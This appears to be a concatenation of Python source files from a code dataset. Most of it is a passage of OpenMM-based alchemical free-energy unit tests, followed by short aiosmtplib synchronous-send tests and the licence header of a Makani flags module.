testsystems.HostGuestExplicit(nonbondedMethod=openmm.app.CutoffPeriodic)
@classmethod
def define_regions(cls):
"""Create shared AlchemicalRegions for test systems in cls.test_regions."""
cls.test_region_zero = dict()
cls.test_region_one = dict()
cls.test_region_two = dict()
cls.test_region_zero['LennardJonesCluster'] = AlchemicalRegion(alchemical_atoms=range(2), name='zero')
cls.test_region_one['LennardJonesCluster'] = AlchemicalRegion(alchemical_atoms=range(2,4), name='one')
cls.test_region_two['LennardJonesCluster'] = AlchemicalRegion(alchemical_atoms=range(4,6), name='two')
cls.test_region_zero['LennardJonesFluid'] = AlchemicalRegion(alchemical_atoms=range(10), name='zero')
cls.test_region_one['LennardJonesFluid'] = AlchemicalRegion(alchemical_atoms=range(10,20), name='one')
cls.test_region_two['LennardJonesFluid'] = AlchemicalRegion(alchemical_atoms=range(20,30), name='two')
cls.test_region_zero['TIP3P WaterBox'] = AlchemicalRegion(alchemical_atoms=range(3), name='zero')
cls.test_region_one['TIP3P WaterBox'] = AlchemicalRegion(alchemical_atoms=range(3,6), name='one')
cls.test_region_two['TIP3P WaterBox'] = AlchemicalRegion(alchemical_atoms=range(6,9), name='two')
#Three regions push HostGuest system beyond 32 force groups
cls.test_region_zero['HostGuestExplicit'] = AlchemicalRegion(alchemical_atoms=range(126, 156), name='zero')
cls.test_region_one['HostGuestExplicit'] = AlchemicalRegion(alchemical_atoms=range(156,160), name='one')
cls.test_region_two['HostGuestExplicit'] = None
@classmethod
def generate_cases(cls):
"""Generate all test cases in cls.test_cases combinatorially."""
cls.test_cases = dict()
direct_space_factory = AbsoluteAlchemicalFactory(alchemical_pme_treatment='direct-space',
alchemical_rf_treatment='switched')
exact_pme_factory = AbsoluteAlchemicalFactory(alchemical_pme_treatment='exact')
# We generate all possible combinations of annihilate_sterics/electrostatics
# for each test system. We also annihilate bonds, angles and torsions every
# 3 test cases so that we test it at least one for each test system and for
# each combination of annihilate_sterics/electrostatics.
n_test_cases = 0
for test_system_name, test_system in cls.test_systems.items():
# Find standard alchemical region zero.
for region_name_zero, region_zero in cls.test_region_zero.items():
if region_name_zero in test_system_name:
break
assert region_name_zero in test_system_name, test_system_name
# Find standard alchemical region one.
for region_name_one, region_one in cls.test_region_one.items():
if region_name_one in test_system_name:
break
assert region_name_one in test_system_name, test_system_name
# Find standard alchemical region two.
for region_name_two, region_two in cls.test_region_two.items():
if region_name_two in test_system_name:
break
assert region_name_two in test_system_name, test_system_name
assert region_name_zero == region_name_one and region_name_one == region_name_two
#We only want two regions for HostGuest or we get too many force groups
if 'HostGuestExplicit' in region_name_one:
test_regions = [region_zero, region_one]
else:
test_regions = [region_zero, region_one, region_two]
# Find nonbonded method.
force_idx, nonbonded_force = forces.find_forces(test_system.system, openmm.NonbondedForce, only_one=True)
nonbonded_method = nonbonded_force.getNonbondedMethod()
# Create all combinations of annihilate_sterics/electrostatics.
for annihilate_sterics, annihilate_electrostatics in itertools.product((True, False), repeat=2):
# Create new region that we can modify.
for i, test_region in enumerate(test_regions):
test_regions[i] = test_region._replace(annihilate_sterics=annihilate_sterics,
annihilate_electrostatics=annihilate_electrostatics)
# Create test name.
test_case_name = test_system_name[:]
if annihilate_sterics:
test_case_name += ', annihilated sterics'
if annihilate_electrostatics:
test_case_name += ', annihilated electrostatics'
# Annihilate bonds and angles every three test_cases.
if n_test_cases % 3 == 0:
for i, test_region in enumerate(test_regions):
test_regions[i] = test_region._replace(alchemical_bonds=True, alchemical_angles=True,
alchemical_torsions=True)
test_case_name += ', annihilated bonds, angles and torsions'
# Add different softcore parameters every five test_cases.
if n_test_cases % 5 == 0:
for i, test_region in enumerate(test_regions):
test_regions[i] = test_region._replace(softcore_alpha=1.0, softcore_beta=1.0, softcore_a=1.0, softcore_b=1.0,
softcore_c=1.0, softcore_d=1.0, softcore_e=1.0, softcore_f=1.0)
test_case_name += ', modified softcore parameters'
#region_interactions = frozenset(itertools.combinations(range(len(test_regions)), 2))
# Pre-generate alchemical system.
alchemical_system = direct_space_factory.create_alchemical_system(test_system.system, alchemical_regions = test_regions)
# Add test case.
cls.test_cases[test_case_name] = (test_system, alchemical_system, test_regions)
n_test_cases += 1
# If we don't use softcore electrostatics and we annihilate charges
# we can test also exact PME treatment. We don't increase n_test_cases
# purposely to keep track of which tests are added above.
if (test_regions[1].softcore_beta == 0.0 and annihilate_electrostatics and
nonbonded_method in [openmm.NonbondedForce.PME, openmm.NonbondedForce.Ewald]):
alchemical_system = exact_pme_factory.create_alchemical_system(test_system.system, alchemical_regions = test_regions)
test_case_name += ', exact PME'
cls.test_cases[test_case_name] = (test_system, alchemical_system, test_regions)
# If the test system uses reaction field replace reaction field
# of the reference system to allow comparisons.
if nonbonded_method == openmm.NonbondedForce.CutoffPeriodic:
forcefactories.replace_reaction_field(test_system.system, return_copy=False,
switch_width=direct_space_factory.switch_width)
def test_split_force_groups(self):
"""Forces having different lambda variables should have a different force group."""
# Select 1 implicit, 1 explicit, and 1 exact PME explicit test case randomly.
test_cases = self.filter_cases(lambda x: 'Implicit' in x, max_number=1)
test_cases.update(self.filter_cases(lambda x: 'Explicit ' in x and 'exact PME' in x, max_number=1))
test_cases.update(self.filter_cases(lambda x: 'Explicit ' in x and 'exact PME' not in x, max_number=1))
for test_name, (test_system, alchemical_system, alchemical_region) in test_cases.items():
region_names = []
for region in alchemical_region:
region_names.append(region.name)
f = partial(check_split_force_groups, alchemical_system, region_names)
f.description = "Testing force splitting among groups of {}".format(test_name)
yield f
def test_noninteracting_energy_components(self):
"""Check all forces annihilated/decoupled when their lambda variables are zero."""
for test_name, (test_system, alchemical_system, alchemical_region) in self.test_cases.items():
f = partial(check_multi_noninteracting_energy_components, test_system.system, alchemical_system,
alchemical_region, test_system.positions)
f.description = "Testing non-interacting energy of {}".format(test_name)
yield f
@attr('slow')
def test_platforms(self):
"""Test interacting and noninteracting energies on all platforms."""
global GLOBAL_ALCHEMY_PLATFORM
old_global_platform = GLOBAL_ALCHEMY_PLATFORM
# Do not repeat tests on the platform already tested.
if old_global_platform is None:
default_platform_name = utils.get_fastest_platform().getName()
else:
default_platform_name = old_global_platform.getName()
platforms = [platform for platform in utils.get_available_platforms()
if platform.getName() != default_platform_name]
# Test interacting and noninteracting energies on all platforms.
for platform in platforms:
GLOBAL_ALCHEMY_PLATFORM = platform
for test_name, (test_system, alchemical_system, alchemical_region) in self.test_cases.items():
f = partial(compare_system_energies, test_system.system, alchemical_system,
alchemical_region, test_system.positions)
f.description = "Test fully interacting energy of {} on {}".format(test_name, platform.getName())
yield f
f = partial(check_multi_noninteracting_energy_components, test_system.system, alchemical_system,
alchemical_region, test_system.positions)
f.description = "Test non-interacting energy of {} on {}".format(test_name, platform.getName())
yield f
# Restore global platform
GLOBAL_ALCHEMY_PLATFORM = old_global_platform
@attr('slow')
def test_fully_interacting_energy_components(self):
"""Test interacting state energy by force component."""
# This is a very expensive but very informative test. We can
# run this locally when test_fully_interacting_energies() fails.
test_cases = self.filter_cases(lambda x: 'Explicit' in x)
for test_name, (test_system, alchemical_system, alchemical_region) in test_cases.items():
f = partial(check_multi_interacting_energy_components, test_system.system, alchemical_system,
alchemical_region, test_system.positions)
f.description = "Testing energy components of %s..." % test_name
yield f
class TestDispersionlessAlchemicalFactory(object):
"""
Only test overlap for dispersionless alchemical factory, since energy agreement
will be poor.
"""
@classmethod
def setup_class(cls):
"""Create test systems and shared objects."""
cls.define_systems()
cls.define_regions()
cls.generate_cases()
@classmethod
def define_systems(cls):
"""Create test systems and shared objects."""
cls.test_systems = dict()
cls.test_systems['LennardJonesFluid with dispersion correction'] = \
testsystems.LennardJonesFluid(nparticles=100, dispersion_correction=True)
@classmethod
def define_regions(cls):
"""Create shared AlchemicalRegions for test systems in cls.test_regions."""
cls.test_regions = dict()
cls.test_regions['LennardJonesFluid'] = AlchemicalRegion(alchemical_atoms=range(10))
@classmethod
def generate_cases(cls):
"""Generate all test cases in cls.test_cases combinatorially."""
cls.test_cases = dict()
factory = AbsoluteAlchemicalFactory(disable_alchemical_dispersion_correction=True)
# We generate all possible combinations of annihilate_sterics/electrostatics
# for each test system. We also annihilate bonds, angles and torsions every
# 3 test cases so that we test it at least one for each test system and for
# each combination of annihilate_sterics/electrostatics.
n_test_cases = 0
for test_system_name, test_system in cls.test_systems.items():
# Find standard alchemical region.
for region_name, region in cls.test_regions.items():
if region_name in test_system_name:
break
assert region_name in test_system_name
# Create all combinations of annihilate_sterics.
for annihilate_sterics in itertools.product((True, False), repeat=1):
region = region._replace(annihilate_sterics=annihilate_sterics,
annihilate_electrostatics=True)
# Create test name.
test_case_name = test_system_name[:]
if annihilate_sterics:
test_case_name += ', annihilated sterics'
# Pre-generate alchemical system
alchemical_system = factory.create_alchemical_system(test_system.system, region)
cls.test_cases[test_case_name] = (test_system, alchemical_system, region)
n_test_cases += 1
def test_overlap(self):
"""Tests overlap between reference and alchemical systems."""
for test_name, (test_system, alchemical_system, alchemical_region) in self.test_cases.items():
#cached_trajectory_filename = os.path.join(os.environ['HOME'], '.cache', 'alchemy', 'tests',
# test_name + '.pickle')
cached_trajectory_filename = None
f = partial(overlap_check, test_system.system, alchemical_system, test_system.positions,
cached_trajectory_filename=cached_trajectory_filename, name=test_name)
f.description = "Testing reference/alchemical overlap for no alchemical dispersion {}".format(test_name)
yield f
@attr('slow')
class TestAbsoluteAlchemicalFactorySlow(TestAbsoluteAlchemicalFactory):
"""Test AbsoluteAlchemicalFactory class with a more comprehensive set of systems."""
@classmethod
def define_systems(cls):
"""Create test systems and shared objects."""
cls.test_systems = dict()
cls.test_systems['LennardJonesFluid without dispersion correction'] = \
testsystems.LennardJonesFluid(nparticles=100, dispersion_correction=False)
cls.test_systems['DischargedWaterBox with reaction field, no switch, no dispersion correction'] = \
testsystems.DischargedWaterBox(dispersion_correction=False, switch=False,
nonbondedMethod=openmm.app.CutoffPeriodic)
cls.test_systems['WaterBox with reaction field, no switch, dispersion correction'] = \
testsystems.WaterBox(dispersion_correction=False, switch=True, nonbondedMethod=openmm.app.CutoffPeriodic)
cls.test_systems['WaterBox with reaction field, switch, no dispersion correction'] = \
testsystems.WaterBox(dispersion_correction=False, switch=True, nonbondedMethod=openmm.app.CutoffPeriodic)
cls.test_systems['WaterBox with PME, switch, dispersion correction'] = \
testsystems.WaterBox(dispersion_correction=True, switch=True, nonbondedMethod=openmm.app.PME)
# Big systems.
cls.test_systems['LysozymeImplicit'] = testsystems.LysozymeImplicit()
cls.test_systems['DHFRExplicit with reaction field'] = \
testsystems.DHFRExplicit(nonbondedMethod=openmm.app.CutoffPeriodic)
cls.test_systems['SrcExplicit with PME'] = \
testsystems.SrcExplicit(nonbondedMethod=openmm.app.PME)
cls.test_systems['SrcExplicit with reaction field'] = \
testsystems.SrcExplicit(nonbondedMethod=openmm.app.CutoffPeriodic)
cls.test_systems['SrcImplicit'] = testsystems.SrcImplicit()
@classmethod
def define_regions(cls):
super(TestAbsoluteAlchemicalFactorySlow, cls).define_regions()
cls.test_regions['WaterBox'] = AlchemicalRegion(alchemical_atoms=range(3))
cls.test_regions['LysozymeImplicit'] = AlchemicalRegion(alchemical_atoms=range(2603, 2621))
cls.test_regions['DHFRExplicit'] = AlchemicalRegion(alchemical_atoms=range(0, 2849))
cls.test_regions['Src'] = AlchemicalRegion(alchemical_atoms=range(0, 21))
# =============================================================================
# TEST ALCHEMICAL STATE
# =============================================================================
class TestAlchemicalState(object):
"""Test AlchemicalState compatibility with CompoundThermodynamicState."""
@classmethod
def setup_class(cls):
"""Create test systems and shared objects."""
alanine_vacuum = testsystems.AlanineDipeptideVacuum()
alanine_explicit = testsystems.AlanineDipeptideExplicit()
factory = AbsoluteAlchemicalFactory()
factory_exact_pme = AbsoluteAlchemicalFactory(alchemical_pme_treatment='exact')
cls.alanine_alchemical_atoms = list(range(22))
cls.alanine_test_system = alanine_explicit
# System with only lambda_sterics and lambda_electrostatics.
alchemical_region = AlchemicalRegion(alchemical_atoms=cls.alanine_alchemical_atoms)
alchemical_alanine_system = factory.create_alchemical_system(alanine_vacuum.system, alchemical_region)
cls.alanine_state = states.ThermodynamicState(alchemical_alanine_system,
temperature=300*unit.kelvin)
# System with lambda_sterics and lambda_electrostatics and exact PME treatment.
alchemical_alanine_system_exact_pme = factory_exact_pme.create_alchemical_system(alanine_explicit.system,
alchemical_region)
cls.alanine_state_exact_pme = states.ThermodynamicState(alchemical_alanine_system_exact_pme,
temperature=300*unit.kelvin,
pressure=1.0*unit.atmosphere)
# System with all lambdas.
alchemical_region = AlchemicalRegion(alchemical_atoms=cls.alanine_alchemical_atoms,
alchemical_torsions=True, alchemical_angles=True,
alchemical_bonds=True)
fully_alchemical_alanine_system = factory.create_alchemical_system(alanine_vacuum.system, alchemical_region)
cls.full_alanine_state = states.ThermodynamicState(fully_alchemical_alanine_system,
temperature=300*unit.kelvin)
# Test case: (ThermodynamicState, defined_lambda_parameters)
cls.test_cases = [
(cls.alanine_state, {'lambda_sterics', 'lambda_electrostatics'}),
(cls.alanine_state_exact_pme, {'lambda_sterics', 'lambda_electrostatics'}),
(cls.full_alanine_state, {'lambda_sterics', 'lambda_electrostatics', 'lambda_bonds',
'lambda_angles', 'lambda_torsions'})
]
@staticmethod
def test_constructor():
"""Test AlchemicalState constructor behave as expected."""
# Raise an exception if parameter is not recognized.
with nose.tools.assert_raises(AlchemicalStateError):
AlchemicalState(lambda_electro=1.0)
# Properties are initialized correctly.
test_cases = [{},
{'lambda_sterics': 0.5, 'lambda_angles': 0.5},
{'lambda_electrostatics': 1.0}]
for test_kwargs in test_cases:
alchemical_state = AlchemicalState(**test_kwargs)
for parameter in AlchemicalState._get_controlled_parameters():
if parameter in test_kwargs:
assert getattr(alchemical_state, parameter) == test_kwargs[parameter]
else:
assert getattr(alchemical_state, parameter) is None
def test_from_system_constructor(self):
"""Test AlchemicalState.from_system constructor."""
# A non-alchemical system raises an error.
with nose.tools.assert_raises(AlchemicalStateError):
AlchemicalState.from_system(testsystems.AlanineDipeptideVacuum().system)
# Valid parameters are 1.0 by default in AbsoluteAlchemicalFactory,
# and all the others must be None.
for state, defined_lambdas in self.test_cases:
alchemical_state = AlchemicalState.from_system(state.system)
for parameter in AlchemicalState._get_controlled_parameters():
property_value = getattr(alchemical_state, parameter)
if parameter in defined_lambdas:
assert property_value == 1.0, '{}: {}'.format(parameter, property_value)
else:
assert property_value is None, '{}: {}'.format(parameter, property_value)
@staticmethod
def test_equality_operator():
"""Test equality operator between AlchemicalStates."""
state1 = AlchemicalState(lambda_electrostatics=1.0)
state2 = AlchemicalState(lambda_electrostatics=1.0)
state3 = AlchemicalState(lambda_electrostatics=0.9)
state4 = AlchemicalState(lambda_electrostatics=0.9, lambda_sterics=1.0)
assert state1 == state2
assert state2 != state3
assert state3 != state4
def test_apply_to_system(self):
"""Test method AlchemicalState.apply_to_system()."""
# Do not modify cached test cases.
test_cases = copy.deepcopy(self.test_cases)
# Test precondition: all parameters are 1.0.
for state, defined_lambdas in test_cases:
kwargs = dict.fromkeys(defined_lambdas, 1.0)
alchemical_state = AlchemicalState(**kwargs)
assert alchemical_state == AlchemicalState.from_system(state.system)
# apply_to_system() modifies the state.
for state, defined_lambdas in test_cases:
kwargs = dict.fromkeys(defined_lambdas, 0.5)
alchemical_state = AlchemicalState(**kwargs)
system = state.system
alchemical_state.apply_to_system(system)
system_state = AlchemicalState.from_system(system)
assert system_state == alchemical_state
# Raise an error if an extra parameter is defined in the system.
for state, defined_lambdas in test_cases:
defined_lambdas = set(defined_lambdas) # Copy
defined_lambdas.pop() # Remove one element.
kwargs = dict.fromkeys(defined_lambdas, 1.0)
alchemical_state = AlchemicalState(**kwargs)
with nose.tools.assert_raises(AlchemicalStateError):
alchemical_state.apply_to_system(state.system)
# Raise an error if an extra parameter is defined in the state.
for state, defined_lambdas in test_cases:
if 'lambda_bonds' in defined_lambdas:
continue
defined_lambdas = set(defined_lambdas) # Copy
defined_lambdas.add('lambda_bonds') # Add extra parameter.
kwargs = dict.fromkeys(defined_lambdas, 1.0)
alchemical_state = AlchemicalState(**kwargs)
with nose.tools.assert_raises(AlchemicalStateError):
alchemical_state.apply_to_system(state.system)
def test_check_system_consistency(self):
"""Test method AlchemicalState.check_system_consistency()."""
# A system is consistent with itself.
alchemical_state = AlchemicalState.from_system(self.alanine_state.system)
alchemical_state.check_system_consistency(self.alanine_state.system)
# Raise error if system has MORE lambda parameters.
with nose.tools.assert_raises(AlchemicalStateError):
alchemical_state.check_system_consistency(self.full_alanine_state.system)
# Raise error if system has LESS lambda parameters.
alchemical_state = AlchemicalState.from_system(self.full_alanine_state.system)
with nose.tools.assert_raises(AlchemicalStateError):
alchemical_state.check_system_consistency(self.alanine_state.system)
# Raise error if system has different lambda values.
alchemical_state.lambda_bonds = 0.5
with nose.tools.assert_raises(AlchemicalStateError):
alchemical_state.check_system_consistency(self.full_alanine_state.system)
def test_apply_to_context(self):
"""Test method AlchemicalState.apply_to_context."""
integrator = openmm.VerletIntegrator(1.0*unit.femtosecond)
# Raise error if Context has more parameters than AlchemicalState.
alchemical_state = AlchemicalState.from_system(self.alanine_state.system)
context = self.full_alanine_state.create_context(copy.deepcopy(integrator))
with nose.tools.assert_raises(AlchemicalStateError):
alchemical_state.apply_to_context(context)
del context
# Raise error if AlchemicalState is applied to a Context with missing parameters.
alchemical_state = AlchemicalState.from_system(self.full_alanine_state.system)
context = self.alanine_state.create_context(copy.deepcopy(integrator))
with nose.tools.assert_raises(AlchemicalStateError):
alchemical_state.apply_to_context(context)
del context
# Correctly sets Context's parameters.
for state in [self.full_alanine_state, self.alanine_state_exact_pme]:
alchemical_state = AlchemicalState.from_system(state.system)
context = state.create_context(copy.deepcopy(integrator))
alchemical_state.set_alchemical_parameters(0.5)
alchemical_state.apply_to_context(context)
for parameter_name, parameter_value in context.getParameters().items():
if parameter_name in alchemical_state._parameters:
assert parameter_value == 0.5
del context
def test_standardize_system(self):
"""Test method AlchemicalState.standardize_system."""
test_cases = [self.full_alanine_state, self.alanine_state_exact_pme]
for state in test_cases:
# First create a non-standard system.
system = copy.deepcopy(state.system)
alchemical_state = AlchemicalState.from_system(system)
alchemical_state.set_alchemical_parameters(0.5)
alchemical_state.apply_to_system(system)
# Test pre-condition: The state of the System has been changed.
assert AlchemicalState.from_system(system).lambda_electrostatics == 0.5
# Check that _standardize_system() sets all parameters back to 1.0.
alchemical_state._standardize_system(system)
standard_alchemical_state = AlchemicalState.from_system(system)
assert alchemical_state != standard_alchemical_state
for parameter_name, value in alchemical_state._parameters.items():
standard_value = getattr(standard_alchemical_state, parameter_name)
assert (value is None and standard_value is None) or (standard_value == 1.0)
def test_find_force_groups_to_update(self):
"""Test method AlchemicalState._find_force_groups_to_update."""
test_cases = [self.full_alanine_state, self.alanine_state_exact_pme]
for thermodynamic_state in test_cases:
system = copy.deepcopy(thermodynamic_state.system)
alchemical_state = AlchemicalState.from_system(system)
alchemical_state2 = copy.deepcopy(alchemical_state)
# Each lambda should be separated in its own force group.
expected_force_groups = {}
for force, lambda_name, _ in AlchemicalState._get_system_controlled_parameters(
system, parameters_name_suffix=None):
expected_force_groups[lambda_name] = force.getForceGroup()
integrator = openmm.VerletIntegrator(2.0*unit.femtoseconds)
context = create_context(system, integrator)
# No force group should be updated if we don't move.
assert alchemical_state._find_force_groups_to_update(context, alchemical_state2, memo={}) == set()
# Change the lambdas one by one and check that the method
# recognize that the force group energy must be updated.
for lambda_name in AlchemicalState._get_controlled_parameters():
# Check that the system defines the global variable.
if getattr(alchemical_state, lambda_name) is None:
continue
# Change the current state.
setattr(alchemical_state2, lambda_name, 0.0)
force_group = expected_force_groups[lambda_name]
assert alchemical_state._find_force_groups_to_update(context, alchemical_state2, memo={}) == {force_group}
setattr(alchemical_state2, lambda_name, 1.0) # Reset current state.
del context
def test_alchemical_functions(self):
"""Test alchemical variables and functions work correctly."""
system = copy.deepcopy(self.full_alanine_state.system)
alchemical_state = AlchemicalState.from_system(system)
# Add two alchemical variables to the state.
alchemical_state.set_function_variable('lambda', 1.0)
alchemical_state.set_function_variable('lambda2', 0.5)
assert alchemical_state.get_function_variable('lambda') == 1.0
assert alchemical_state.get_function_variable('lambda2') == 0.5
# Cannot call an alchemical variable as a supported parameter.
with nose.tools.assert_raises(AlchemicalStateError):
alchemical_state.set_function_variable('lambda_sterics', 0.5)
# Assign string alchemical functions to parameters.
alchemical_state.lambda_sterics = AlchemicalFunction('lambda')
alchemical_state.lambda_electrostatics = AlchemicalFunction('(lambda + lambda2) / 2.0')
assert alchemical_state.lambda_sterics == 1.0
assert alchemical_state.lambda_electrostatics == 0.75
# Setting alchemical variables updates alchemical parameter as well.
alchemical_state.set_function_variable('lambda2', 0)
assert alchemical_state.lambda_electrostatics == 0.5
# ---------------------------------------------------
# Integration tests with CompoundThermodynamicStates
# ---------------------------------------------------
def test_constructor_compound_state(self):
"""The AlchemicalState is set on construction of the CompoundState."""
test_cases = copy.deepcopy(self.test_cases)
# Test precondition: the original systems are in fully interacting state.
for state, defined_lambdas in test_cases:
system_state = AlchemicalState.from_system(state.system)
kwargs = dict.fromkeys(defined_lambdas, 1.0)
assert system_state == AlchemicalState(**kwargs)
# CompoundThermodynamicState set the system state in constructor.
for state, defined_lambdas in test_cases:
kwargs = dict.fromkeys(defined_lambdas, 0.5)
alchemical_state = AlchemicalState(**kwargs)
compound_state = states.CompoundThermodynamicState(state, [alchemical_state])
system_state = AlchemicalState.from_system(compound_state.system)
assert system_state == alchemical_state
def test_lambda_properties_compound_state(self):
"""Lambda properties setters/getters work in the CompoundState system."""
test_cases = copy.deepcopy(self.test_cases)
for state, defined_lambdas in test_cases:
alchemical_state = AlchemicalState.from_system(state.system)
compound_state = states.CompoundThermodynamicState(state, [alchemical_state])
# Defined properties can be assigned and read.
for parameter_name in defined_lambdas:
assert getattr(compound_state, parameter_name) == 1.0
setattr(compound_state, parameter_name, 0.5)
assert getattr(compound_state, parameter_name) == 0.5
# System global variables are updated correctly
system_alchemical_state = AlchemicalState.from_system(compound_state.system)
for parameter_name in defined_lambdas:
assert getattr(system_alchemical_state, parameter_name) == 0.5
# Same for parameters setters.
compound_state.set_alchemical_parameters(1.0)
system_alchemical_state = AlchemicalState.from_system(compound_state.system)
for parameter_name in defined_lambdas:
assert getattr(compound_state, parameter_name) == 1.0
assert getattr(system_alchemical_state, parameter_name) == 1.0
# Same for alchemical variables setters.
compound_state.set_function_variable('lambda', 0.25)
for parameter_name in defined_lambdas:
setattr(compound_state, parameter_name, AlchemicalFunction('lambda'))
system_alchemical_state = AlchemicalState.from_system(compound_state.system)
for parameter_name in defined_lambdas:
assert getattr(compound_state, parameter_name) == 0.25
assert getattr(system_alchemical_state, parameter_name) == 0.25
def test_set_system_compound_state(self):
"""Setting inconsistent system in compound state raise errors."""
alanine_state = copy.deepcopy(self.alanine_state)
alchemical_state = AlchemicalState.from_system(alanine_state.system)
compound_state = states.CompoundThermodynamicState(alanine_state, [alchemical_state])
# We create an inconsistent state that has different parameters.
incompatible_state = copy.deepcopy(alchemical_state)
incompatible_state.lambda_electrostatics = 0.5
# Setting an inconsistent alchemical system raise an error.
system = compound_state.system
incompatible_state.apply_to_system(system)
with nose.tools.assert_raises(AlchemicalStateError):
compound_state.system = system
# Same for set_system when called with default arguments.
with nose.tools.assert_raises(AlchemicalStateError):
compound_state.set_system(system)
# This doesn't happen if we fix the state.
compound_state.set_system(system, fix_state=True)
assert AlchemicalState.from_system(compound_state.system) != incompatible_state
def test_method_compatibility_compound_state(self):
"""Compatibility between states is handled correctly in compound state."""
test_cases = [self.alanine_state, self.alanine_state_exact_pme]
# An incompatible state has a different set of defined lambdas.
full_alanine_state = copy.deepcopy(self.full_alanine_state)
alchemical_state_incompatible = AlchemicalState.from_system(full_alanine_state.system)
compound_state_incompatible = states.CompoundThermodynamicState(full_alanine_state,
[alchemical_state_incompatible])
for state in test_cases:
state = copy.deepcopy(state)
alchemical_state = AlchemicalState.from_system(state.system)
compound_state = states.CompoundThermodynamicState(state, [alchemical_state])
# A compatible state has the same defined lambda parameters,
# but their values can be different.
alchemical_state_compatible = copy.deepcopy(alchemical_state)
assert alchemical_state.lambda_electrostatics != 0.5 # Test pre-condition.
alchemical_state_compatible.lambda_electrostatics = 0.5
compound_state_compatible = states.CompoundThermodynamicState(copy.deepcopy(state),
[alchemical_state_compatible])
# Test states compatibility.
assert compound_state.is_state_compatible(compound_state_compatible)
assert not compound_state.is_state_compatible(compound_state_incompatible)
# Test context compatibility.
integrator = openmm.VerletIntegrator(1.0*unit.femtosecond)
context = compound_state_compatible.create_context(copy.deepcopy(integrator))
assert compound_state.is_context_compatible(context)
context = compound_state_incompatible.create_context(copy.deepcopy(integrator))
assert not compound_state.is_context_compatible(context)
@staticmethod
def _check_compatibility(state1, state2, context_state1, is_compatible):
"""Check the compatibility of states and contexts between 2 states."""
# Compatibility should be commutative
assert state1.is_state_compatible(state2) is is_compatible
assert state2.is_state_compatible(state1) is is_compatible
# Test context incompatibility is commutative.
context_state2 = state2.create_context(openmm.VerletIntegrator(1.0*unit.femtosecond))
assert state2.is_context_compatible(context_state1) is is_compatible
assert state1.is_context_compatible(context_state2) is is_compatible
del context_state2
def test_method_reduced_potential_compound_state(self):
"""Test CompoundThermodynamicState.reduced_potential_at_states() method.
Computing the reduced potential singularly and with the class
method should give the same result.
"""
# Build a mixed collection of compatible and incompatible thermodynamic states.
thermodynamic_states = [
copy.deepcopy(self.alanine_state),
copy.deepcopy(self.alanine_state_exact_pme)
]
alchemical_states = [
AlchemicalState(lambda_electrostatics=1.0, lambda_sterics=1.0),
AlchemicalState(lambda_electrostatics=0.5, lambda_sterics=1.0),
AlchemicalState(lambda_electrostatics=0.5, lambda_sterics=0.0),
AlchemicalState(lambda_electrostatics=1.0, lambda_sterics=1.0)
]
compound_states = []
for thermo_state in thermodynamic_states:
for alchemical_state in alchemical_states:
compound_states.append(states.CompoundThermodynamicState(
copy.deepcopy(thermo_state), [copy.deepcopy(alchemical_state)]))
# Group thermodynamic states by compatibility.
compatible_groups, _ = states.group_by_compatibility(compound_states)
assert len(compatible_groups) == 2
# Compute the reduced potentials.
expected_energies = []
obtained_energies = []
for compatible_group in compatible_groups:
# Create context.
integrator = openmm.VerletIntegrator(2.0*unit.femtoseconds)
context = compatible_group[0].create_context(integrator)
context.setPositions(self.alanine_test_system.positions[:compatible_group[0].n_particles])
# Compute with single-state method.
for state in compatible_group:
state.apply_to_context(context)
expected_energies.append(state.reduced_potential(context))
# Compute with multi-state method.
compatible_energies = states.ThermodynamicState.reduced_potential_at_states(context, compatible_group)
# The first and the last state must be equal.
assert np.isclose(compatible_energies[0], compatible_energies[-1])
obtained_energies.extend(compatible_energies)
assert np.allclose(np.array(expected_energies), np.array(obtained_energies))
def test_serialization(self):
"""Test AlchemicalState serialization alone and in a compound state."""
alchemical_state = AlchemicalState(lambda_electrostatics=0.5, lambda_angles=None)
alchemical_state.set_function_variable('lambda', 0.0)
alchemical_state.lambda_sterics = AlchemicalFunction('lambda')
# Test serialization/deserialization of AlchemicalState.
serialization = utils.serialize(alchemical_state)
deserialized_state = utils.deserialize(serialization)
original_pickle = pickle.dumps(alchemical_state)
deserialized_pickle = pickle.dumps(deserialized_state)
assert original_pickle == deserialized_pickle
# Test serialization/deserialization of AlchemicalState in CompoundState.
test_cases = [copy.deepcopy(self.alanine_state), copy.deepcopy(self.alanine_state_exact_pme)]
for thermodynamic_state in test_cases:
compound_state = states.CompoundThermodynamicState(thermodynamic_state, [alchemical_state])
# The serialized system is standard.
serialization = utils.serialize(compound_state)
serialized_standard_system = serialization['thermodynamic_state']['standard_system']
# Decompress the serialized_system
serialized_standard_system = zlib.decompress(serialized_standard_system).decode(
states.ThermodynamicState._ENCODING)
assert serialized_standard_system.__hash__() == compound_state._standard_system_hash
# The object is deserialized correctly.
deserialized_state = utils.deserialize(serialization)
assert pickle.dumps(compound_state) == pickle.dumps(deserialized_state)
# =============================================================================
# MAIN FOR MANUAL DEBUGGING
# =============================================================================
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO)
|
tests/test_sync.py | P-EB/aiosmtplib | 265 | 12749733 | """
Sync method tests.
"""
import pytest
from aiosmtplib.sync import async_to_sync
def test_sendmail_sync(
event_loop, smtp_client_threaded, sender_str, recipient_str, message_str
):
errors, response = smtp_client_threaded.sendmail_sync(
sender_str, [recipient_str], message_str
)
assert not errors
assert isinstance(errors, dict)
assert response != ""
def test_sendmail_sync_when_connected(
event_loop, smtp_client_threaded, sender_str, recipient_str, message_str
):
event_loop.run_until_complete(smtp_client_threaded.connect())
errors, response = smtp_client_threaded.sendmail_sync(
sender_str, [recipient_str], message_str
)
assert not errors
assert isinstance(errors, dict)
assert response != ""
def test_send_message_sync(event_loop, smtp_client_threaded, message):
errors, response = smtp_client_threaded.send_message_sync(message)
assert not errors
assert isinstance(errors, dict)
assert response != ""
def test_send_message_sync_when_connected(event_loop, smtp_client_threaded, message):
event_loop.run_until_complete(smtp_client_threaded.connect())
errors, response = smtp_client_threaded.send_message_sync(message)
assert not errors
assert isinstance(errors, dict)
assert response != ""
def test_async_to_sync_without_loop(event_loop):
async def test_func():
return 7
result = async_to_sync(test_func())
assert result == 7
def test_async_to_sync_with_exception(event_loop):
async def test_func():
raise ZeroDivisionError
with pytest.raises(ZeroDivisionError):
async_to_sync(test_func(), loop=event_loop)
@pytest.mark.asyncio
async def test_async_to_sync_with_running_loop(event_loop):
with pytest.raises(RuntimeError):
async_to_sync(None)
|
lib/python/flag_types.py | leozz37/makani | 1,178 | 12749748 | <filename>lib/python/flag_types.py
# Copyright 2020 Makani Technologies LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
